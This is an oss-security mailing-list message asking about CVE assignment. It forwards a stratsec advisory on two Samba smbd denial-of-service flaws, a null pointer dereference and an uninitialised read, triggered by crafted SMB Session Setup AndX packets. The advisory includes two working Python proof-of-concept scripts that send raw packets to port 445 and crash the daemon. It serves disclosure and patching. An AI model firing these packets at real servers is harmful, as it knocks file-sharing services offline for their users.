Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities

[Thomas Biege <thomas () novell com>]

So far no assignments were made, right?

Am Donnerstag 20 Mai 2010 16:17:48 schrieb Thomas Biege:
> Hello oss-security,
> was a CVE-ID assigned for this issue already?
>
> Thanks,
> Thomas
>
>
> ----------  Forwarded Message  ----------
>
> Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba
> Multiple DoS Vulnerabilities
> Date: Mittwoch 12 Mai 2010, 09:00:07
> From: stratsec Advisories <advisories () stratsec net>
> An:  "full-disclosure () lists grok org uk"
> <full-disclosure () lists grok org uk>
>
> ===========================================================================
> ==== stratsec Security Advisory: SS-2010-005
> ===========================================================================
> ====
>
> Title:           Samba Multiple DoS Vulnerabilities
> Version:         1.0
> Issue type:      Multiple
> Affected vendor: Samba
> Release date:    12/05/2010
> Discovered by:   Laurent Gaffié
> Issue status:    Patch available
>
> ===========================================================================
> ====
>
> Summary
> -------
>
> Two vulnerabilities were discovered within in the Samba Smbd daemon which
> allow
> an attacker to trigger a null pointer dereference or an uninitialized
> variable read by sending a specific 'Sessions Setup AndX' query.
> Successful exploitation
> of these issues will result in a denial of service.
>
> Description
> -----------
>
> The Server Message Block (SMB) protocol, also known as Common Internet File
> System (CIFS) acts as an application-layer protocol to provide shared
> access to
> files, printers and Inter-Process Communication (IPC). It is also a
> transport for Distributed Computing Environment / Remote Procedure Call
> (DCE / RPC) operations. After negotiating an SMB communication the client
> sends a 'Session Setup AndX' packet to negotiate a session in order to be
> able to connect on a specific share.
>
> To trigger the null pointer dereference, the client needs to send a crafted
> SMB
> 'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003'
> (no Unicode), followed by a Session Setup AndX request with the SMB header
> 'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash
> within
> the Smbd process.
>
> The uninitialised Variable Read issue, can be triggered if the client sends
> a crafted 'Session Setup AndX' with a 'security blob length' value set to
> '\xff\xff'.
>
> Impact
> ------
>
> A remote attacker can cause a denial of service within the Samba daemon
>
> Affected products
> -----------------
>
> Samba <=3.4.7 and Samba <= 3.5.1
>
> Proof of concept
> ----------------
>
> To trigger the uninitialised variable read issue, the following Python
> proof of concept is available:
>
> import sys,socket
> from socket import *
>
> if len(sys.argv)<=1:
>  sys.exit('Usage: python smbd.py 10.0.0.12')
>
> host = sys.argv[1],445
>
> packetnego=(
> "\x00\x00\x00\xaa"
> "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
> "\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
> "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
> "\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
> "\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
> "\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
> "\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
> "\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
> "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
> "\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
> )
>
> payload=(
> "\x00\x00\x01\xa3"
> "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
> "\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
> "\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
> "\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
> "\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
> "\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
> "\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
> "\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
> "\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
> "\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
> "\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
> "\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
> "\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
> "\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
> "\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
> "\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
> "\x3f\x3f\x00"
> )
>
> s = socket(AF_INET, SOCK_STREAM)
> s.connect(host)
> s.send(''.join(packetnego))
> s.send(''.join(payload))
>
>
> To trigger the null pointer dereference issue this Python proof of
> concept is available:
>
> import sys,socket
> from socket import *
>
> if len(sys.argv)<=1:
>  sys.exit('python smbd.py 10.0.0.12')
>
> host = sys.argv[1],445
>
> packetnego=(
> "\x00\x00\x00\x85"
> "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
> "\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
> "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
> "\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
> "\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
> "\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
> "\x30\x2e\x31\x32\x00"
> )
>
> payload=(
> "\x00\x00\x00\xec"
> "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
> "\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
> "\xff\xff"  ## Security blob set to \xff\xff here
> "\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
> "\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
> "\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
> "\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
> "\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
> "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
> "\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
> "\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
> "\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
> "\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
> "\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
> )
> s = socket(AF_INET, SOCK_STREAM)
> s.connect(host)
> s.send(''.join(packetnego))
> s.send(''.join(payload))
>
> Solution
> --------
>
> Update to version 3.5.2 or 3.4.8 (http://samba.org/)
>
> Response timeline
> -----------------
>
> * 09/03/2010 - Null pointer dereference issue reported to vendor.
> * 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after
>                receiving the initial email
> * 09/03/2010 - Vendor confirms issue presence, and provide a patch 3
>                hours after receiving the initial email.
> * 09/03/2010 - stratsec confirms patch resolves issue.
> * 15/03/2010 - Uninitialised Variable Read issue reported to vendor.
> * 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours
>                after receiving the initial email.
> * 15/03/2010 - stratsec confirms patch resolves issue
> * 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
> * 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
> * 12/05/2010 - This advisory published.
>
> References
> ----------
> * Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
> * https://bugzilla.samba.org/show_bug.cgi?id=7254
> * stratsec would like to thanks the Samba Security Team for their
>   responsiveness while handling theses issues
>
> ===========================================================================
> ====
>
> About stratsec
> --------------
> stratsec, specialises in providing information security consulting and
> testing services for government and commercial clients. Established in
> 2004, we are now one of the leading independent information security
> companies in the Australasian and SE-Asian region, with offices throughout
> Australia and in Singapore and Malaysia.
>
> For more information, please visit our website at http://www.stratsec.net/
>
> ===========================================================================
> ====

-- 
 Thomas Biege <thomas () novell com>, SUSE LINUX, Security Support & Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)